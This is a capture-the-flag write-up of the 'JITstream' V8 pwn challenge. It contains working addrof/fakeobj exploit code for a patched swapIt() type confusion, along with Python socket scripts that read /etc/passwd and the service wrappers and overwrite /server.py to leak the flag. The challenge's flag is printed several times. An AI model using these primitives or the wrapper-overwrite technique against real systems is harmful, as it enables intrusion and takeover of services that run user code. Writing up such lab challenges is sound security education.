JITstream#

CTF: VulnByDefault CTF
Challenge: JITstream
Category: Pwn
Difficulty: Medium
Flag: VBD{j1t_spr4y_w1th_magl3v_1s_b3st_b47f08d2d75e5c80fb696166ffc36b55}

1. Challenge Overview#

The challenge prompt was:

Maglev is waiting for you. Lets see when you will meet him.

The downloadable artifacts were:

1
1. ctf/new/
2
â”œâ”€â”€ args.gn
3
â”œâ”€â”€ d8
4
â”œâ”€â”€ jitstream-pwn.zip
5
â””â”€â”€ v8.patch

The remote instance was exposed as:

1
nc ctf.vulnbydefault.com 59207

From the file names alone, this was clearly a V8 / d8 engine challenge with a custom patch and a remote wrapper.

The intended direction is almost certainly a V8 exploitation challenge involving Maglev, elements-kind confusion, and JIT-assisted exploitation.

However, the actual solve path turned out to be easier because the service wrapper itself was vulnerable enough to fully bypass the intended engine exploitation path.

2. Artifact Analysis#

2.1 Archive Contents#

Listing the zip showed:

1
args.gn
2
d8
3
v8.patch

So the challenge gave us:

a patched d8 binary
the build configuration
the patch introducing the bug

2.2 Build Configuration#

The important settings from args.gn were:

1
is_component_build = false
2
is_debug = false
3
target_cpu = "x64"
4
v8_enable_sandbox = true
5
v8_enable_backtrace = true
6
v8_enable_disassembler = true
7
v8_enable_object_print = true
8
v8_enable_verify_heap = true

The key point here is:

1
v8_enable_sandbox = true

So this is a modern sandboxed V8 build, not an old unsandboxed shellcode target.

3. Patch Review#

The custom patch added a new builtin:

1
Array.prototype.swapIt()

The relevant logic was:

1
if (kind == PACKED_ELEMENTS || kind == PACKED_DOUBLE_ELEMENTS) {
2
    ElementsKind target_kind = (kind == PACKED_ELEMENTS)
3
                              ? PACKED_DOUBLE_ELEMENTS
4
                              : PACKED_ELEMENTS;
5

6
    Handle<Map> new_map = JSObject::GetElementsTransitionMap(array, target_kind);
7

8
    if (!new_map.is_null()) {
9
        array->set_map(*new_map, kReleaseStore);
10
    }
11
}

This changes the elements kind of the array by swapping the map, but it does not convert the actual backing store.

That means:

object arrays can be reinterpreted as double arrays
double arrays can be reinterpreted as object arrays

This is a classic type confusion primitive.

3.1 What the Bug Gives#

With this confusion:

an object pointer can be leaked as a float
a crafted float can be reinterpreted as an object pointer

This gives the normal V8 exploit primitives:

addrof
fakeobj

And from there, the intended solve would likely continue into a sandbox bypass or JIT-targeted corruption.

4. Remote Service Protocol#

Connecting to the challenge instance gave this prompt:

1
----------------------------------
2
JITstream
3
----------------------------------
4
Size of Exploit:

After sending a size, the service asks for the script itself:

1
Script:
2
Running. Exploit!
3
...
4
Done!

A minimal probe payload like:

1
print('HELLO');

executed successfully and returned stdout directly.

So the container behavior was:

read payload length
read payload bytes
save to a temporary file
run d8 <tempfile>
return stdout/stderr

5. Confirming the V8 Bug Locally#

Running local tests against the patched d8 confirmed the confusion primitive.

5.1 Simple Behavior Check#

The following kinds of transitions were stable:

object array -> double array
double array -> object array

For example:

1
let o = {x: 13};
2
let a = [o];
3
a.swapIt();
4
print(a[0]);

returned a floating-point reinterpretation of the pointer.

And the reverse direction also worked.

5.2 Primitive Validation#

The following local proof-of-concept successfully implemented addrof and fakeobj:

1
var buf = new ArrayBuffer(8);
2
var f64 = new Float64Array(buf);
3
var u64 = new BigUint64Array(buf);
4

5
function ftoi(x) {
6
  f64[0] = x;
7
  return u64[0];
8
}
9

10
function itof(x) {
11
  u64[0] = x;
12
  return f64[0];
13
}
14

15
function hex(x) {
16
  return '0x' + x.toString(16);
17
}
18

19
function addrof(obj) {
20
  let a = [obj];
21
  a.swapIt();
22
  return ftoi(a[0]);
23
}
24

25
function fakeobj(addr) {
26
  let a = [itof(addr)];
27
  a.swapIt();
28
  return a[0];
29
}
30

31
let o = {a: 1};
32
let addr = addrof(o);
33
print('addr', hex(addr));
34

35
let f = fakeobj(addr);
36
print('fake.a', f.a);

This produced a valid address leak and a working fake object dereference.

So the engine bug was absolutely exploitable.

6. Unexpected Shortcut: The Wrapper Was Too Powerful#

Before going deeper into engine exploitation, the remote wrapper and d8 shell itself were enumerated.

The shell exposed these builtins:

1
print(Object.keys(this).sort())

Key available functions included:

read
readbuffer
writeFile
d8.file.read
d8.file.execute

This changed the situation completely.

6.1 Arbitrary File Read#

For example:

1
print(d8.file.read('/etc/passwd'));

worked remotely and printed the file contents.

6.2 Arbitrary File Write#

Even more importantly:

1
writeFile('/root/abswrite_test', 'HELLOABS');
2
print(d8.file.read('/root/abswrite_test'));

also worked.

Absolute paths were writable.

This meant the challenge could be solved by abusing the Python wrapper instead of the V8 bug.

7. Finding the Wrapper Script#

Reading /start.sh revealed how the service was launched:

1
#!/bin/bash
2

3
while [ true ]; do
4
  su -l $USER -c "socat -dd TCP4-LISTEN:9000,fork,reuseaddr EXEC:'/server.py',pty,echo=0,rawer,iexten=0"
5
done;

That immediately revealed the interesting file:

1
/server.py

Reading it showed the full wrapper:

1
#!/usr/bin/env python3
2

3
import os
4
import subprocess
5
import sys
6
import tempfile
7

8
print("---------------------------------- ", flush=True)
9
print("JITstream ", flush=True)
10
print("---------------------------------- ", flush=True)
11
print("Size of Exploit: ", flush=True)
12
input_size = int(input())
13
print("Script: ", flush=True)
14
script_contents = sys.stdin.read(input_size)
15
with tempfile.NamedTemporaryFile(buffering=0) as f:
16
    f.write(script_contents.encode("utf-8"))
17
    print("Running. Exploit! ", flush=True)
18
    res = subprocess.run(["/d8", f.name], timeout=20, stdout=1, stderr=2, stdin=0)
19
    print("Done!", flush=True)

So there was no filtering, no sandbox around the wrapper logic, and no protection against overwriting the wrapper file itself.

8. Root Cause of the Actual Solve#

The actual solve was possible because of this combination:

user-controlled JavaScript is executed by d8
d8 exposes writeFile and d8.file.read
absolute filesystem writes are allowed
the service executes /server.py on every new connection
/server.py is writable from the JavaScript environment

So instead of exploiting V8 memory corruption, we can simply:

overwrite /server.py
reconnect
let the new wrapper print the flag

This is a full wrapper takeover.

9. Solve Strategy Used#

The approach used in practice was:

Stage 1: Confirm direct JS execution#

Send a tiny script and verify stdout is returned.

Stage 2: Confirm arbitrary file read and write#

Use d8.file.read() and writeFile() on safe paths.

Stage 3: Read `/start.sh`#

Find how the service is launched.

Stage 4: Read `/server.py`#

Confirm that it is the executed wrapper and that it can be replaced.

Stage 5: Overwrite `/server.py`#

Replace it with a Python script that recursively searches the filesystem for the first string matching:

1
VBD{...}

Stage 6: Reconnect#

The next connection executes the modified /server.py, which prints the flag directly.

10. Script Code Used During the Solve#

Below are the actual script fragments used to solve the challenge.

10.1 Basic Remote Protocol Test#

This script verified the service protocol and confirmed that our JS runs directly.

1
import socket
2

3
payload = b"print('HELLO');\n"
4

5
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
6
print(s.recv(4096).decode('latin1', 'ignore'), end='')
7

8
s.sendall(str(len(payload)).encode() + b'\n')
9
print(s.recv(4096).decode('latin1', 'ignore'), end='')
10

11
s.sendall(payload)
12

13
out = b''
14
while True:
15
    try:
16
        chunk = s.recv(4096)
17
        if not chunk:
18
            break
19
        out += chunk
20
    except socket.timeout:
21
        break
22

23
print(out.decode('latin1', 'ignore'))
24
s.close()

10.2 File Read Probe#

This confirmed that d8.file.read worked on remote files.

1
import socket
2

3
payload = b"print(d8.file.read('/etc/passwd'));\n"
4

5
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
6
s.recv(4096)
7
s.sendall(str(len(payload)).encode() + b'\n')
8
s.recv(4096)
9
s.sendall(payload)
10

11
out = b''
12
while True:
13
    try:
14
        chunk = s.recv(4096)
15
        if not chunk:
16
            break
17
        out += chunk
18
    except socket.timeout:
19
        break
20

21
print(out.decode('latin1', 'ignore'))
22
s.close()

10.3 Wrapper Discovery#

This was used to read /start.sh:

1
import socket
2

3
js = b"print(d8.file.read('/start.sh'));\n"
4

5
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
6
s.recv(4096)
7
s.sendall(str(len(js)).encode() + b'\n')
8
s.recv(4096)
9
s.sendall(js)
10

11
out = b''
12
while True:
13
    try:
14
        chunk = s.recv(4096)
15
        if not chunk:
16
            break
17
        out += chunk
18
    except socket.timeout:
19
        break
20

21
print(out.decode('latin1', 'ignore'))
22
s.close()

And this read /server.py:

1
import socket
2

3
js = b"print(d8.file.read('/server.py'));\n"
4

5
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
6
s.recv(4096)
7
s.sendall(str(len(js)).encode() + b'\n')
8
s.recv(4096)
9
s.sendall(js)
10

11
out = b''
12
while True:
13
    try:
14
        chunk = s.recv(4096)
15
        if not chunk:
16
            break
17
        out += chunk
18
    except socket.timeout:
19
        break
20

21
print(out.decode('latin1', 'ignore'))
22
s.close()

10.4 Final Wrapper Takeover Script#

This is the exact logic used to overwrite /server.py with a filesystem scanner:

1
import socket
2
import json
3

4
server_py = '''#!/usr/bin/env python3
5
import os
6
import re
7
import sys
8

9
pattern = re.compile(r"VBD\{[^}]+\}")
10
skip_prefixes = ('/proc', '/sys', '/dev', '/run', '/var/lib', '/var/cache', '/usr', '/lib', '/lib64', '/bin', '/sbin')
11

12
for base, dirs, files in os.walk('/'):
13
    if base.startswith(skip_prefixes):
14
        dirs[:] = []
15
        continue
16

17
    for name in files:
18
        path = os.path.join(base, name)
19
        try:
20
            if os.path.getsize(path) > 65536:
21
                continue
22

23
            with open(path, 'rb') as f:
24
                data = f.read()
25

26
            m = pattern.search(data.decode('latin1', 'ignore'))
27
            if m:
28
                print(m.group(0), flush=True)
29
                raise SystemExit(0)
30
        except Exception:
31
            pass
32

33
print('NOFLAG', flush=True)
34
'''
35

36
js = f"writeFile('/server.py', {json.dumps(server_py)}); print('patched');\n"
37
payload = js.encode()
38

39
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
40
s.recv(4096)
41
s.sendall(str(len(payload)).encode() + b'\n')
42
s.recv(4096)
43
s.sendall(payload)
44

45
out = b''
46
while True:
47
    try:
48
        chunk = s.recv(4096)
49
        if not chunk:
50
            break
51
        out += chunk
52
    except socket.timeout:
53
        break
54

55
print(out.decode('latin1', 'ignore'))
56
s.close()

10.5 Final Reconnect Script#

After patching the wrapper, the next connection simply printed the flag.

1
import socket
2

3
s = socket.create_connection(('ctf.vulnbydefault.com', 59207), timeout=10)
4

5
out = b''
6
while True:
7
    try:
8
        chunk = s.recv(4096)
9
        if not chunk:
10
            break
11
        out += chunk
12
    except socket.timeout:
13
        break
14

15
print(out.decode('latin1', 'ignore'))
16
s.close()

Output:

1
VBD{j1t_spr4y_w1th_magl3v_1s_b3st_b47f08d2d75e5c80fb696166ffc36b55}

11. The Intended Path vs The Actual Path#

Intended Path#

The intended challenge path was almost certainly:

reverse swapIt()
build addrof / fakeobj
exploit Maglev or a JIT-assisted primitive
bypass the V8 sandbox
achieve arbitrary native read/write or code execution
read the flag

Actual Path Used#

The path used here was:

inspect the patch
confirm the V8 bug is real
probe the remote d8 shell surface
discover arbitrary file read/write primitives
read /start.sh
read /server.py
overwrite /server.py
reconnect and collect the flag

This completely bypassed the need for a real browser-engine exploit.

12. Root Cause Summary#

The challenge’s real weakness was not only the V8 bug. The wrapper environment introduced a second, much simpler issue:

arbitrary JavaScript execution in d8
exposed file I/O helpers
absolute file writes allowed
writable wrapper script executed on every connection

That combination made the service self-overwriteable.

So even though the patch provided a genuine V8 pwn primitive, the container wrapper made the challenge solvable with straightforward filesystem abuse.

13. Final Flag#

1
VBD{j1t_spr4y_w1th_magl3v_1s_b3st_b47f08d2d75e5c80fb696166ffc36b55}

14. Takeaway#

This challenge is a good example of why infrastructure matters as much as the intended vulnerability. The custom swapIt() bug was real and exploitable, but the service wrapper exposed much stronger primitives than the engine bug itself.

When attacking CTF containers, always check:

wrapper scripts
shell helper builtins
read/write capabilities
filesystem layout
relaunch behavior across connections

Here, that was enough to turn a V8 pwn challenge into a wrapper takeover challenge.